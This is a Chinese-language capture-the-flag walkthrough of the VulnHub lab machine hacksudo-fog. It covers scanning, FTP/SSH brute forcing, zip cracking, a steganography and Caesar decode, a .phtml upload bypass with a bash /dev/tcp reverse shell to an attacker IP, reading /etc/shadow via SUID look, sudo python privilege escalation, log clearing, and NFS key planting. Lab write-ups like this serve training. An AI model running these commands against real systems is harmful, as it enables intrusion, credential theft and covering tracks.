vulnhub靶场【hacksudo】之Fog

一、前言

靶机：hacksudo-fog

攻击：kali

都是采用虚拟机，网卡为桥接模式

二、主机发现

使用arp-scan -l或者netdiscover -r 192.168.1.1/24

三、信息收集

1. 使用nmap进行扫描

因为发现有些端口不是常用的，所以采用扫描全部端口再扫描一次

2. 网站收集

访问80端口服务

查看页面源代码，可以看到大概率是目录型网站

访问index1.html，可以看到是一张图片

访问页面源代码，看到一张图片的链接，以及一段提示，说是caesar密码，并给出一个链接地址，一个作者名，收集起来

访问链接地址，是一个项目

查看说明，好家伙是音频隐写，不过这个项目中的音频明显是测试使用的，文件名都是demo

扫描网站的目录

使用gobuster、dirb、dirsearch、dirbuster、ffuf等工具

访问cms，发现其在加载时，一直是连接某个IP地址

不过在扫描的时候，发现扫描cms一直停留在目录，并没有文件出来，测试这个目录试试

逐个访问，发现admin有个登录，尝试测试后，弱密码不行，万能密码也不行，暂时搁置

对这个cms进行指纹识别，发现版本等

搜索有无漏洞，发现有，暂时先不用，看能否继续收集到信息

访问dict.txt，给出的字典，估计可能会爆破

四、漏洞寻找

1. 解密

到这里基本上已经信息收集差不多，不过在80端口也未发现有漏洞

尝试使用fpt的匿名登录，无密码是不能登录，或者未开启匿名登录

尝试使用获取到的dict.txt和作者名hacksudo爆破ftp和ssh

使用ftp登录

查看flag1.txt文件，然后切换到目录后，查看authors.txt，发现其中的一个名称vishal waghmare，以及一个压缩包，把这个压缩包下载到kali

尝试解压，发现需要密码

使用fcrackzip或者使用john的套件进行破解，先使用zip2john转换，然后john破解

查看解压后的文件

这个wav音频文件，啧，想起前面那个项目，把其脚本下载，然后查看用法

使用exwave.py尝试能否提取信息

python3 ExWare.py -f ../hacksudoSTEGNO.wav

这一串串字符，在之前的index1.html源代码中，也是看到说是caesar加密，去在线网站进行解密，看到一个最像的，包含用户名密码

XYZABCDEFGHIJKLMNOPQRSTUVW
ABCDEFGHIJKLMNOPQRSTUVWXYZ
wwww.localhost/fog Username=fog:password=hacksudoISRO

2. 反弹shell

这个还给出网址，估计可能是用于网站登录的，访问cms/admin，使用用户名密码登录，登录成功

在这个界面点击各种模块进行测试，虽说用户界面有两个用户，一个fog，一个hacksudo，但是这里并不显示hacksudo的密码，最终发现文件管理处，可以上传文件到/uploads目录，并且该目录下的一个txt文件，有脚本语言php写的命令。

直接对该文件进行修改，不过这里对于文件类型做了限制，直接改为php、php5等可能不行，这里测试到phtml后发现可以，并且可以被解析成脚本语言

测试使用bash命令看能否进行反弹

bash -c 'bash -i >& /dev/tcp/192.168.1.16/9999 0>&1'
//进行URL编码
bash+-c+%27bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.1.16%2f9999+0%3e%261%27%0a

五、提取

1. 内网信息收集

查看之前在cms目录下的config.php

在查看目录时，发现一个flag

尝试使用上面的数据库连接的用户名和密码进行登录测试

查询该数据库下的表时，发现users，直接查询其中的数据

这里看到，hacksudo的密码是与fog一样的，不过也只能登录网站，且权限不如fog

一圈搜索，寻找具有SUID权限文件，发现look，之前碰到过，look可以读取数据，这个具有SUID的话，就可以读取之前不能读取的数据

find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -exec ls -al {} \; 2>/dev/null

可以在网站gtfobins.github.io查看用法

使用look查看/etc/shadow

2. 密码hash破解

当然这里也可以查看/etc/passwd，然后把两个文件下载到kali，或者 把文件内容复制到kali，使用unshadow整合在一起，再使用john破解即可

很快破解isro的密码qwerty

使用ssh登录到isro用户

获取到一个加密的字符，尝试使用md5解密，发现是vishal

3. python提取至root

使用find寻找具有SUID权限的文件，发现sudo，使用sudo -l列出

发现整个isro目录下都可以，那么就查看其中有什么门道，发现在其/fog目录下，有一个文件的所有者是root，测试该文件，发现是python2

使用python提取

六、清除痕迹

清理日志

把之前修改的文件改回去

七、总结

1. 目录扫描全面，所有的子级目录也是不能忽略的
2. 对于一些CMS有一定的了解，这里的CMS其实就是有可利用的漏洞，可以复现的
3. 信息收集的所有东西，可能都是有用的，这里就是通过收集到的信息，组成密码，对ftp爆破
4. 一定要记得查看页面源代码
5. 对于使用find寻找具有SUID权限的文件，方式不止一种
6. 即便通过sudo -l列出了一些文件，自己也要去分别，文件的所有者，是否能够达到提取

这里忽略一点，因为开启了rpcbind和nfs服务，虽然这里无法使用，但还是要进行一个说明

使用nmap可以先进行探索，探索目标的rpc信息

nmap -p 111 --script=rpcinfo 192.168.1.50

然后使用脚本探测，有无可用的mount

nmap --script=nfs-* 192.168.1.50

这里是提示没有可用的，如果这里是有可用的，就可以使用命令showmount查看有哪些目录可以

如果根目录可以的话，就可以把目标的nfs通过命令mount挂载到本地，并且挂载的是有同步性的。

所以这里就可以通过在kali中生成一个ssh的公私钥文件，然后把这个公钥文件给复制替换到原本的公钥文件，就可以达到无密码登录，也就是一个所谓的方式